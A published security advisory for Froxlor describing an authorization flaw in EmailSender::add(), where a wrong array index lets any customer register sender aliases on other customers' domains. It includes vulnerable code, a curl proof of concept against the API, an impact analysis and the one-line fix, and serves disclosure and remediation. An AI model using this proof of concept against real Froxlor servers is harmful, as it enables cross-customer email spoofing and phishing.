PT-2026-35187 · Packagist · Froxlor/Froxlor

Published

2026-04-16

·

Updated

2026-04-16

CVSS v3.1

5.0

Medium

VectorAV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N

Summary

In EmailSender::add(), the domain ownership validation for full email sender aliases uses the wrong array index when splitting the email address, passing the local part instead of the domain to validateLocalDomainOwnership(). This causes the ownership check to always pass for non-existent "domains," allowing any authenticated customer to add sender aliases for email addresses on domains belonging to other customers. Postfix's sender login maps then authorizes the attacker to send emails as those addresses.

Details

In lib/Froxlor/Api/Commands/EmailSender.php at line 100, when a customer adds a full email address (not a @domain wildcard) as an allowed sender, the code splits on @ and takes index [0]:
php
// Line 96-106
if (substr($allowed sender, 0, 1) != '@') {
  if (!Validate::validateEmail($idna convert->encode($allowed sender))) {
    Response::standardError('emailiswrong', $allowed sender, true);
  }
  self::validateLocalDomainOwnership(explode("@", $allowed sender)[0] ?? ""); // BUG: [0] is the local part
} else {
  if (!Validate::validateDomain($idna convert->encode(substr($allowed sender, 1)))) {
    Response::standardError('wildcardemailiswrong', substr($allowed sender, 1), true);
  }
  self::validateLocalDomainOwnership(substr($allowed sender, 1)); // CORRECT: passes domain
}
For input admin@domain-b.com, explode("@", "admin@domain-b.com") returns ["admin", "domain-b.com"]. Index [0] is "admin" — the local part, not the domain.
The validateLocalDomainOwnership() function (lines 346-355) then queries panel domains for a domain matching "admin":
php
private static function validateLocalDomainOwnership(string $domain): void
{
  $sel stmt = Database::prepare("SELECT customerid FROM `" . TABLE PANEL DOMAINS . "` WHERE `domain` = :domain");
  $domain result = Database::pexecute first($sel stmt, ['domain' => $domain]);
  if ($domain result && $domain result['customerid'] != CurrentUser::getField('customerid')) {
    Response::standardError('senderdomainnotowned', $domain, true);
  }
}
Since no domain named "admin" exists in panel domains, $domain result is false, and the function returns without error — the ownership check silently passes.
The inserted mail sender aliases row is then picked up by Postfix's sender login maps query (configured in mysql-virtual sender permissions.cf):
sql
... UNION (SELECT mail sender aliases.email FROM mail sender aliases
WHERE mail sender aliases.allowed sender = '%s') ...
This query maps the allowed sender back to the mail user, authorizing them to send as that address via SMTP.

PoC

bash
# Prerequisites: Froxlor instance with mail.enable allow sender enabled,
# two customers: Customer A (owns domain-a.com) and Customer B (owns domain-b.com)

# Step 1: As Customer A, add a sender alias claiming Customer B's domain
# Via API:
curl -X POST 'https://froxlor-host/api/v1/' 
 -H 'Authorization: Basic <customer-A-credentials>' 
 -H 'Content-Type: application/json' 
 -d '{
  "command": "EmailSender.add",
  "params": {
   "emailaddr": "myaccount@domain-a.com",
   "allowed sender": "ceo@domain-b.com"
  }
 }'

# Expected: Error "senderdomainnotowned" because domain-b.com belongs to Customer B
# Actual: 200 OK — alias is created because validateLocalDomainOwnership
#     receives "ceo" (local part) instead of "domain-b.com" (domain)

# Step 2: Verify the alias was inserted
curl -X POST 'https://froxlor-host/api/v1/' 
 -H 'Authorization: Basic <customer-A-credentials>' 
 -H 'Content-Type: application/json' 
 -d '{
  "command": "EmailSender.listing",
  "params": {"emailaddr": "myaccount@domain-a.com"}
 }'

# Step 3: Customer A can now send email as ceo@domain-b.com via SMTP
# because Postfix sender login maps will match the mail sender aliases entry
# and authorize Customer A's mail account to use that sender address.
The same attack works via the web UI by POST-ing to customer email.php with action=add sender and the target domain in allowed domain.

Impact

Any authenticated customer on a multi-tenant Froxlor instance can add sender aliases for email addresses on domains belonging to other customers. This allows:
  • Cross-customer email spoofing: Send emails impersonating users on other customers' domains, bypassing Postfix's smtpd sender login maps restriction that is specifically designed to prevent this.
  • Multi-tenant isolation breach: The domain ownership check (validateLocalDomainOwnership) is the only barrier preventing cross-customer sender aliasing, and it is completely ineffective for full email addresses.
  • Phishing and reputation damage: Spoofed emails originate from the legitimate mail server, passing SPF/DKIM checks for the target domain if those records point to the Froxlor server.
Note: The wildcard (@domain) code path at line 105 is not affected — it correctly passes the domain to validateLocalDomainOwnership().

Recommended Fix

Change index [0] to [1] on line 100 of lib/Froxlor/Api/Commands/EmailSender.php:
php
// Before (line 100):
self::validateLocalDomainOwnership(explode("@", $allowed sender)[0] ?? "");

// After:
self::validateLocalDomainOwnership(explode("@", $allowed sender)[1] ?? "");
This ensures the domain part of the email address is passed to the ownership validation, matching the behavior of the wildcard path on line 105.

Fix

Incorrect Authorization

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-863

Related Identifiers

GHSA-VMJJ-QR7V-PXM6

Affected Products

Froxlor/Froxlor